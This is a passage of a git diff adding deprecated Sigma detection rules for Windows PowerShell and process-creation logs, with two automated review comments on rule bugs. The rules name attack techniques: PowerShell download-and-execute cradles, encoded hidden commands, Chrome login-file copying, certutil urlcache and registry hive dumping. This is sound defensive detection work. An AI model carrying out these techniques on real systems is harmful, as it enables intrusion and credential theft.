@@ -0,0 +1,38 @@ +title: Accessing Encrypted Credentials from Google Chrome Login Database +id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d +status: deprecated +author: frack113 +date: 2021/12/20 +modified: 2022/05/14 +description: | + Adversaries may acquire credentials from web browsers by reading files specific to the target browser. + Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. + Web browsers typically store the credentials in an encrypted format within a credential store. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md +logsource: + product: windows + category: ps_script + definition: Script block logging must be enabled +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection_cmd: + ScriptBlockText|contains|all: + - Copy-Item + - -Destination + selection_path: + ScriptBlockText|contains: + - \Google\Chrome\User Data\Default\Login Data + - \Google\Chrome\User Data\Default\Login Data For Account + condition: ps_script and (all of selection_*) +falsepositives: + - Unknown +level: medium +tags: + - attack.credential_access + - attack.t1555.003 +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml new file mode 100644 index 000000000..11c36e4fd --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_azurehound_commands.yml 
@@ -0,0 +1,36 @@ +title: AzureHound PowerShell Commands +id: 83083ac6-1816-4e76-97d7-59af9a9ae46e +status: deprecated +description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound +references: + - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 + - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html +author: Austin Songer (@austinsonger) +date: 2021/10/23 +modified: 2023/01/02 +tags: + - attack.discovery + - attack.t1482 + - attack.t1087 + - attack.t1087.001 + - attack.t1087.002 + - attack.t1069.001 + - attack.t1069.002 + - attack.t1069 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: Invoke-AzureHound + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml new file mode 100644 index 000000000..ee47d037b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_invocation_lolscript.yml 
@@ -0,0 +1,32 @@ +title: Execution via CL_Invocation.ps1 - Powershell +id: 4cd29327-685a-460e-9dac-c3ab96e549dc +status: deprecated +description: Detects Execution via SyncInvoke in CL_Invocation.ps1 module +references: + - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ + - https://twitter.com/bohops/status/948061991012327424 +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - CL_Invocation.ps1 + - SyncInvoke + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml new file mode 100644 index 000000000..fe3a486ae --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_cl_mutexverifiers_lolscript.yml 
@@ -0,0 +1,32 @@ +title: Execution via CL_Mutexverifiers.ps1 +id: 39776c99-1c7b-4ba0-b5aa-641525eee1a4 +status: deprecated +description: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module +references: + - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ + - https://twitter.com/pabraeken/status/995111125447577600 +author: oscd.community, Natalia Shornikova +date: 2020/10/14 +modified: 2023/08/17 +tags: + - attack.defense_evasion + - attack.t1216 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains|all: + - CL_Mutexverifiers.ps1 + - runAfterCancelProcess + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml new file mode 100644 index 000000000..e76013dc6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_file_and_directory_discovery.yml 
@@ -0,0 +1,37 @@ +title: Powershell File and Directory Discovery +id: d23f2ba5-9da0-4463-8908-8ee47f614bb9 +status: deprecated +description: | + Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. + Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, + including whether or not the adversary fully infects the target and/or attempts specific actions. +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md +author: frack113 +date: 2021/12/15 +modified: 2023/12/11 +tags: + - attack.discovery + - attack.t1083 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: + - ls + - get-childitem + - gci + recurse: + ScriptBlockText|contains: -recurse + condition: ps_script and (selection and recurse) +falsepositives: + - Unknown +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml new file mode 100644 index 000000000..02daa14f3 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_invoke_nightmare.yml 
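Review bot: The `selection` entry `ls` under `ScriptBlockText|contains` matches that two-letter substring anywhere in the script block (`false`, `tools`, `else`, `$results`, …), so `selection` is effectively always true and the rule collapses to `ScriptBlockText|contains: -recurse`. The rule is marked `deprecated`, so this is a note for anyone still loading the converted copy rather than a change request: if it is kept active, anchor the token (e.g. `'ls '` or `'ls -'`) or drop it and keep `get-childitem` / `gci`, and accept that `-recurse` on its own is a low-signal indicator, which `level: low` already reflects.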
@@ -0,0 +1,29 @@ +title: PrintNightmare Powershell Exploitation +id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf +status: deprecated +description: Detects Commandlet name for PrintNightmare exploitation. +references: + - https://github.com/calebstewart/CVE-2021-1675 +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +date: 2021/08/09 +modified: 2023/01/02 +tags: + - attack.privilege_escalation + - attack.t1548 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enabled +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: Invoke-Nightmare + condition: ps_script and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml new file mode 100644 index 000000000..71c2bc83e --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/posh_ps_susp_gwmi.yml 
@@ -0,0 +1,37 @@ +title: Suspicious Get-WmiObject +id: 0332a266-b584-47b4-933d-a00b103e1b37 +status: deprecated +description: The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers +references: + - https://attack.mitre.org/datasources/DS0005/ + - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 +author: frack113 +date: 2022/01/12 +modified: 2023/12/11 +tags: + - attack.persistence + - attack.t1546 +logsource: + product: windows + category: ps_script + definition: 'Requirements: Script Block Logging must be enabled' +detection: + ps_script: + EventID: 4104 + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + ScriptBlockText|contains: + - Get-WmiObject + - gwmi + filter_cl_utility: + Path|endswith: \CL_Utility.ps1 + ScriptBlockText|contains|all: + - function Get-FreeSpace + - SELECT * FROM Win32_LogicalDisk WHERE MediaType=12 + condition: ps_script and (selection and not 1 of filter_*) +falsepositives: + - Legitimate PowerShell scripts +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml new file mode 100644 index 000000000..6c3973099 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_download.yml 
@@ -0,0 +1,28 @@ +title: Suspicious PowerShell Download +id: 65531a81-a694-4e31-ae04-f8ba5bc33759 +status: deprecated +description: Detects suspicious PowerShell download command +tags: + - attack.execution + - attack.t1059.001 +author: Florian Roth (Nextron Systems) +date: 2017/03/05 +modified: 2022/04/11 +logsource: + product: windows + service: powershell +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + webclient: + - System.Net.WebClient + download: + - .DownloadFile( + - .DownloadString( + condition: powershell and (webclient and download) +falsepositives: + - PowerShell scripts that download content from the Internet +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml new file mode 100644 index 000000000..426d3065f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_generic.yml @@ -0,0 +1,33 @@ +title: Suspicious PowerShell Invocations - Generic +id: 3d304fda-78aa-43ed-975c-d740798a49c1 +status: deprecated +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 +author: Florian Roth (Nextron Systems) +date: 2017/03/12 +modified: 2022/04/11 +logsource: + product: windows + service: powershell +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection_encoded: + - ' -enc ' + - ' -EncodedCommand ' + selection_hidden: + - ' -w hidden ' + - ' -window hidden ' + - ' -windowstyle hidden ' + selection_noninteractive: + - ' -noni ' + - ' -noninteractive ' + condition: powershell and (all of selection*) +falsepositives: + - Very special / sneaky PowerShell scripts +level: high +ruletype: Sigma 
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml new file mode 100644 index 000000000..394405215 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_suspicious_invocation_specific.yml @@ -0,0 +1,72 @@ +title: Suspicious PowerShell Invocations - Specific +id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c +status: deprecated +description: Detects suspicious PowerShell invocation command parameters +tags: + - attack.execution + - attack.t1059.001 +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro +date: 2017/03/05 +modified: 2023/05/04 +logsource: + product: windows + service: powershell + definition: Script block logging must be enabled for 4104, Module Logging must be enabled for 4103 +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection_convert_b64: + '|all': + - -nop + - ' -w ' + - hidden + - ' -c ' + - '[Convert]::FromBase64String' + selection_iex: + '|all': + - ' -w ' + - hidden + - -noni + - -nop + - ' -c ' + - iex + - New-Object + selection_enc: + '|all': + - ' -w ' + - hidden + - -ep + - bypass + - -Enc + selection_reg: + '|all': + - powershell + - reg + - add + - HKCU\software\microsoft\windows\currentversion\run + selection_webclient: + '|all': + - bypass + - -noprofile + - -windowstyle + - hidden + - new-object + - system.net.webclient + - .download + selection_iex_webclient: + '|all': + - iex + - New-Object + - Net.WebClient + - .Download + filter_chocolatey: + - (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1 + - (New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1') + - Write-ChocolateyWarning + condition: powershell and (1 of selection_* and not 1 of filter_*) +falsepositives: + - Unknown +level: high +ruletype: Sigma 
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml b/tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml new file mode 100644 index 000000000..5fd87989c --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/powershell_syncappvpublishingserver_exe.yml @@ -0,0 +1,30 @@ +title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction +id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 +related: + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. +references: + - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ +author: Ensar Şamil, @sblmsrsn, OSCD Community +date: 2020/10/05 +modified: 2022/04/11 +tags: + - attack.defense_evasion + - attack.t1218 +logsource: + product: windows + service: powershell +detection: + powershell: + Channel: + - Microsoft-Windows-PowerShell/Operational + - PowerShellCore/Operational + selection: + - SyncAppvPublishingServer.exe + condition: powershell and selection +falsepositives: + - App-V clients +level: medium +status: deprecated +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml new file mode 100644 index 000000000..5ddfecdfc --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_apt29_thinktanks.yml 
@@ -0,0 +1,32 @@ +title: APT29 +id: 033fe7d6-66d1-4240-ac6b-28908009c71f +status: deprecated +description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. +references: + - https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/ + - https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html +author: Florian Roth (Nextron Systems) +date: 2018/12/04 +modified: 2023/03/08 +tags: + - attack.execution + - attack.g0016 + - attack.t1059.001 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains|all: + - -noni + - -ep + - bypass + - $ + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml new file mode 100644 index 000000000..59a96c931 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_dragonfly.yml 
@@ -0,0 +1,30 @@ +title: CrackMapExecWin +id: 04d9079e-3905-4b70-ad37-6bdf11304965 +status: deprecated +description: Detects CrackMapExecWin Activity as Described by NCSC +references: + - https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control + - https://attack.mitre.org/software/S0488/ +author: Markus Neis +date: 2018/04/08 +modified: 2023/03/08 +tags: + - attack.g0035 + - attack.credential_access + - attack.discovery + - attack.t1110 + - attack.t1087 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + NewProcessName|endswith: \crackmapexec.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml new file mode 100644 index 000000000..f86863770 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_gallium.yml 
@@ -0,0 +1,36 @@ +title: GALLIUM Artefacts +id: 18739897-21b1-41da-8ee4-5b786915a676 +related: + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived +status: deprecated +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. +references: + - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) +author: Tim Burrell +date: 2020/02/07 +modified: 2023/03/09 +tags: + - attack.credential_access + - attack.t1212 + - attack.command_and_control + - attack.t1071 +logsource: + product: windows + category: process_creation +detection: + process_creation: + EventID: 4688 + Channel: Security + legitimate_process_path: + NewProcessName|contains: + - :\Program Files(x86)\ + - :\Program Files\ + legitimate_executable: + sha1: e570585edc69f9074cb5e8a790708336bd45ca0f + condition: process_creation and (legitimate_executable and not legitimate_process_path) +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml new file mode 100644 index 000000000..83edbab98 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_hurricane_panda.yml 
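Review bot: `legitimate_executable` keys on `sha1:`, but this conversion targets Security `EventID: 4688`, which carries no file-hash fields (hashes come from Sysmon event 1's `Hashes`), so the condition can never be satisfied and the rule is dead on this log source unless the pipeline enriches events with a `sha1` field — worth confirming, and if there is no enrichment either drop the converted copy or state the dependency in `logsource.definition`. Separately, the `legitimate_process_path` entry `:\Program Files(x86)\` is missing the space before `(x86)`; the real directory is `Program Files (x86)`, so that exclusion would not match even on enriched data. Since the rule is already `deprecated`, the cheapest fix may be to exclude it from the converted set.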
@@ -0,0 +1,31 @@ +title: Hurricane Panda Activity +id: 0eb2107b-a596-422e-b123-b389d5594ed7 +status: deprecated +description: Detects Hurricane Panda Activity +references: + - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ +author: Florian Roth (Nextron Systems) +date: 2019/03/04 +modified: 2023/03/10 +tags: + - attack.privilege_escalation + - attack.g0009 + - attack.t1068 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + - CommandLine|contains|all: + - localgroup + - admin + - /add + - CommandLine|contains: \Win64.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml new file mode 100644 index 000000000..749980cca --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml 
@@ -0,0 +1,35 @@ +title: Lazarus Activity Apr21 +id: 4a12fa47-c735-4032-a214-6fab5b120670 +status: deprecated +description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity +references: + - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ +author: Bhabesh Raj +date: 2021/04/20 +modified: 2023/03/10 +tags: + - attack.g0032 + - attack.execution + - attack.t1106 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_1: + CommandLine|contains|all: + - mshta # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3 + - .zip + selection_2: + ParentProcessName: C:\Windows\System32\wbem\wmiprvse.exe + NewProcessName: C:\Windows\System32\mshta.exe + selection_3: + ParentProcessName|contains: :\Users\Public\ + NewProcessName: C:\Windows\System32\rundll32.exe + condition: process_creation and (1 of selection_*) +falsepositives: + - Should not be any false positives +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml new file mode 100644 index 000000000..3c8c6a8a4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_lazarus_loader.yml 
@@ -0,0 +1,46 @@ +title: Lazarus Loaders +id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e +status: deprecated +description: Detects different loaders as described in various threat reports on Lazarus group activity +references: + - https://www.hvs-consulting.de/lazarus-report/ + - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ +author: Florian Roth (Nextron Systems), wagga +date: 2020/12/23 +modified: 2023/03/10 +tags: + - attack.g0032 + - attack.execution + - attack.t1059 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_cmd1: + CommandLine|contains|all: + - 'cmd.exe /c ' + - ' -p 0x' + selection_cmd2: + CommandLine|contains: + - C:\ProgramData\ + - C:\RECYCLER\ + selection_rundll1: + CommandLine|contains|all: + - 'rundll32.exe ' + - C:\ProgramData\ + selection_rundll2: + CommandLine|contains: + - .bin, + - .tmp, + - .dat, + - .io, + - .ini, + - .db, + condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml new file mode 100644 index 000000000..39a87378d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml 
@@ -0,0 +1,31 @@ +title: DNS Tunnel Technique from MuddyWater +id: 36222790-0d43-4fe8-86e4-674b27809543 +status: deprecated +description: Detecting DNS tunnel activity for Muddywater actor +references: + - https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/ + - https://www.vmray.com/analyses/5ad401c3a568/report/overview.html +author: '@caliskanfurkan_' +date: 2020/06/04 +modified: 2023/03/10 +tags: + - attack.command_and_control + - attack.t1071.004 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection: + CommandLine|contains: DataExchange.dll + NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + ParentProcessName|endswith: \excel.exe + condition: process_creation and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml new file mode 100644 index 000000000..7597ea71b --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_apt_ta505_dropper.yml 
@@ -0,0 +1,30 @@ +title: TA505 Dropper Load Pattern +id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 +status: deprecated +description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents +references: + - https://twitter.com/ForensicITGuy/status/1334734244120309760 +author: Florian Roth (Nextron Systems) +date: 2020/12/08 +modified: 2023/04/05 +tags: + - attack.execution + - attack.g0092 + - attack.t1106 +logsource: + category: process_creation + product: windows +detection: + process_creation: + EventID: 4688 + Channel: Security + selection_parent: + ParentProcessName|endswith: \wmiprvse.exe + selection_mshta: + - NewProcessName|endswith: \mshta.exe + - OriginalFileName: mshta.exe + condition: process_creation and (all of selection_*) +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml new file mode 100644 index 000000000..3a2274af6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_certutil_susp_execution.yml 
@@ -0,0 +1,57 @@
+title: Suspicious Certutil Command Usage
+id: e011a729-98a6-4139-b5c4-bf6f6dd8239a
+status: deprecated
+description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
+references:
+ - https://twitter.com/JohnLaTwC/status/835149808817991680
+ - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/
+ - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
+ - https://twitter.com/egre55/status/1087685529016193025
+ - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
+author: Florian Roth (Nextron Systems), juju4, keepwatch
+date: 2019/01/16
+modified: 2023/02/15
+tags:
+ - attack.defense_evasion
+ - attack.t1140
+ - attack.command_and_control
+ - attack.t1105
+ - attack.s0160
+ - attack.g0007
+ - attack.g0010
+ - attack.g0045
+ - attack.g0049
+ - attack.g0075
+ - attack.g0096
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_img:
+ - NewProcessName|endswith: \certutil.exe
+ - OriginalFileName: CertUtil.exe
+ selection_cli:
+ CommandLine|contains:
+ - ' -decode '
+ - ' -decodehex '
+ - ' -urlcache '
+ - ' -verifyctl '
+ - ' -encode '
+ - ' -exportPFX '
+ - ' /decode '
+ - ' /decodehex '
+ - ' /urlcache '
+ - ' /verifyctl '
+ - ' /encode '
+ - ' /exportPFX '
+ condition: process_creation and (all of selection_*)
+fields:
+ - CommandLine
+ - ParentCommandLine
+falsepositives:
+ - False positives depend on scripts and administrative tools used in the monitored environment
+level: high
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml
new file mode 100644
index 000000000..2dcd3b134
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_read_contents.yml
@@ -0,0 +1,36 @@
+title: Read and Execute a File Via Cmd.exe
+id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003
+status: deprecated
+description: Detect use of "/R <" to read and execute a file via cmd.exe
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md
+author: frack113
+date: 2022/08/20
+modified: 2023/03/07
+tags:
+ - attack.execution
+ - attack.t1059.003
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_cmd:
+ - OriginalFileName: Cmd.Exe
+ - NewProcessName|endswith: \cmd.exe
+ selection_read:
+ - ParentCommandLine|contains|all:
+ - cmd
+ - '/r '
+ - <
+ - CommandLine|contains|all:
+ - cmd
+ - '/r '
+ - <
+ condition: process_creation and (all of selection_*)
+falsepositives:
+ - Legitimate use
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml
new file mode 100644
index 000000000..b92f4aded
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_cmd_redirect_to_stream.yml
@@ -0,0 +1,31 @@
+title: Cmd Stream Redirection
+id: 70e68156-6571-427b-a6e9-4476a173a9b6
+status: deprecated
+description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session
+references:
+ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt
+author: frack113
+date: 2022/02/04
+modified: 2023/03/07
+tags:
+ - attack.defense_evasion
+ - attack.t1564.004
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection:
+ CommandLine|contains|all:
+ - '> '
+ - ':'
+ NewProcessName|endswith: \cmd.exe
+ filter:
+ CommandLine|contains: ' :\'
+ condition: process_creation and (selection and not filter)
+falsepositives:
+ - Unknown
+level: medium
+ruletype: Sigma
diff --git a/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml
new file mode 100644
index 000000000..b4bb7dbcc
--- /dev/null
+++ b/tools/sigmac/converted_rules/builtin/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml
@@ -0,0 +1,35 @@
+title: Credential Acquisition via Registry Hive Dumping
+id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0
+status: deprecated
+description: Detects Credential Acquisition via Registry Hive Dumping
+references:
+ - https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html
+author: Tim Rauch
+date: 2022/10/04
+modified: 2023/02/06
+tags:
+ - attack.credential_access
+ - attack.t1003
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ process_creation:
+ EventID: 4688
+ Channel: Security
+ selection_1:
+ - NewProcessName|endswith: \reg.exe
+ - OriginalFileName: reg.exe
+ selection_2:
+ CommandLine|contains:
+ - ' save '
+ - ' export '
+ selection_3:
+ CommandLine|contains:
